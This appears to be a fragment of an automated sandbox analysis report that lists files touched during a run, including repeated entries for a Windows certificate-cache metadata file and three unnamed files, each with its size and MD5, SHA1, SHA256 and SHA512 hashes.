C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD594948acb994187ba726976dbc15668d1
SHA1d2f4cd38a7fdc8f60d6996c1852d436e9a09cea3
SHA256b30927ca399098e196bb7783fcff5731e799647189c97a9aa821f6e52ee0dfec
SHA5121bc78a410bfe0674b1400adacea3ea8e30e4395ada83d4d0d6c6d11fb90b980b79cbfbec0af033475ddf2f1423309e589e6b55ce82775bae88874177acb91ec4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD516a0408b7e50caebd1e9b1be56136b38
SHA1c566cb32813b099ad62d7ccbc58dfc450eee5e06
SHA2567564baaac54af7922e37bb659aa523e27dee836f144e30b76f684833999839ee
SHA512f7f6aba1adf2dabdc6278a70a6b9e25c9dfaac0e7bc2240b3cc6f0375ff6de79c59f29c373ac32ce011c831050a236195b8d209ef8d26786af79bc7cba8a0c34
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e8bcd45deff100a048e93cca379d40c4
SHA127efe2a3eb4f4a66056868ca31fca79fc85c5646
SHA256125068523483e7fd9fc4bd3480220a276dea43d554e4fe91b5cc33e72d1de960
SHA5121161c13910981d65beba088733f2770c069609e278d3a52a279bfa2658d184c5d79158deaf77b127a3e2301bad8038dad0431a67142abce2bf65ec85be3aee7d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD529091c8dc162630c302427dca5182657
SHA12d4cb12ac55365bf40b8fe5bc1a9db5ded2eb9a1
SHA256b27344e52bd4279c35b74d743e949767e474c5f17aad84dd7b4544f95b141589
SHA5127cb720c94f3934c32fdc4eab4cd3f90b632a82e90d321706dd8d836202ab96371c6096bb08735552987a7ae686a6cd80025d9b14fda8c03a52f8d355f8a99bdf
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD560b047687e7c5636d62a2ea31ca18fba
SHA1b10e06c6a43efb87691bf320eedcbf69b4870f31
SHA256f910bc4a3faadadc608a10b2cfb33ea5e67a301b1fc1b2c24574c6f2cc279c15
SHA51296638dc420a69ef1e5eab6f9c89d131c78eb4170319cf1d4f49dd68a52285e363f21316b406a111ab696830a79aa71d18ad37d55a689cceca5a97851ea511445
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD535bf63c2f10f6b4d70baa538f7f70c4c
SHA1e9dd9e51adf2469cf5221281722e608bcd8101fd
SHA25641cf0e30302a32f0981358fe41a3d4dfdf9b962ca5542914766fc010c5de61b8
SHA5123673616152a7c407b7ad7e44ddbb5c0b01618e2ad055e3db375cb1d506ed1265e0836422abd30b3e49e216b263c4064ae91efd52a30be2c7cc34fcf7aa0bc491
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
216KB
MD5732cadeaf934ac1edc47f1a577eca711
SHA1444f18e24d9c48e99b142c85ba6e65cba693988f
SHA256e232ef1159527f8ef57f480dcf0399d9b718354e90449545b1a3b7ea30015871
SHA5129b8a8e36b8e7292915a99a47796cd89dab6af4a506bf956093cbcefc24a4b7d3864f26c50d4b4326c38d03a8aca8c4be822e1702b436e9a97b1e084c6e9c0e5f